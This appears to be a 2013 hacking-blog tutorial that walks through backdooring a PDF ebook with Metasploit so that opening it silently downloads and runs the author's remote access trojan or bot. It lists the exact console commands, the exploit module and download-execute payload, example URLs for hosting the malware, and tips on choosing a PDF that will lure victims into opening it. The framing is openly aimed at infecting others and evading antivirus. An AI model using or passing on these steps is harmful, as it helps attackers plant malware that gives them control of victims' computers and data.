d0837296baef4fc14d667832c1a5215944b54a8f46af2d5c5c [TUT]Backdooring a pdf ebook with metasploit | TipsS And TricksS

[TUT]Backdooring a pdf ebook with metasploit

on Wednesday 23 January 2013
Hey friends this is D@rk TruTH. As we all use RAT, Botnets but the things went wrong when our rats and bots get detected by antiviruses. But today i am gonna show you how to backdoor a pdf ebook. 
Yes a pdf ebook.

Concept behind this--->

Victim will open our pdf file but in background it will download our rat and bot silently and will infect the victim.  

Things you need----->

1. A pdf book (use any book)
2. Metasploit(use backtrack OS)
3. Your Rat or bot hosted at any file sharing site(Make sure you use direct link like www.filesharing.com/server.exe)

Now Lets start this---->

1. Open up Metasploit console

2. Type this in the console:use exploit/windows/fileformat/adobe_pdf_embedded_exe

3. Type this in the console:
set payload windows/download_exec


4. Type this in console:set INFILENAME <location of your pdf to infect here>
EXAMPLE: set INFILENAME /root/mypdf.pdf

5. Type this in console:
set url <direct download link to your fud server>
EXAMPLE: set url http://download.com/server.exe

6. Type this in console:Exploit

Now you will get infected pdf in root folder just send ur pdf file to victim and when he open the pdf file he/she will able to read pdf but in background pdf file will download our rat and bot in victim computer.

Note:
1. Use direct link for your rat.
2. Use a good pdf file so as victim try to open it.

0 comments:

Post a Comment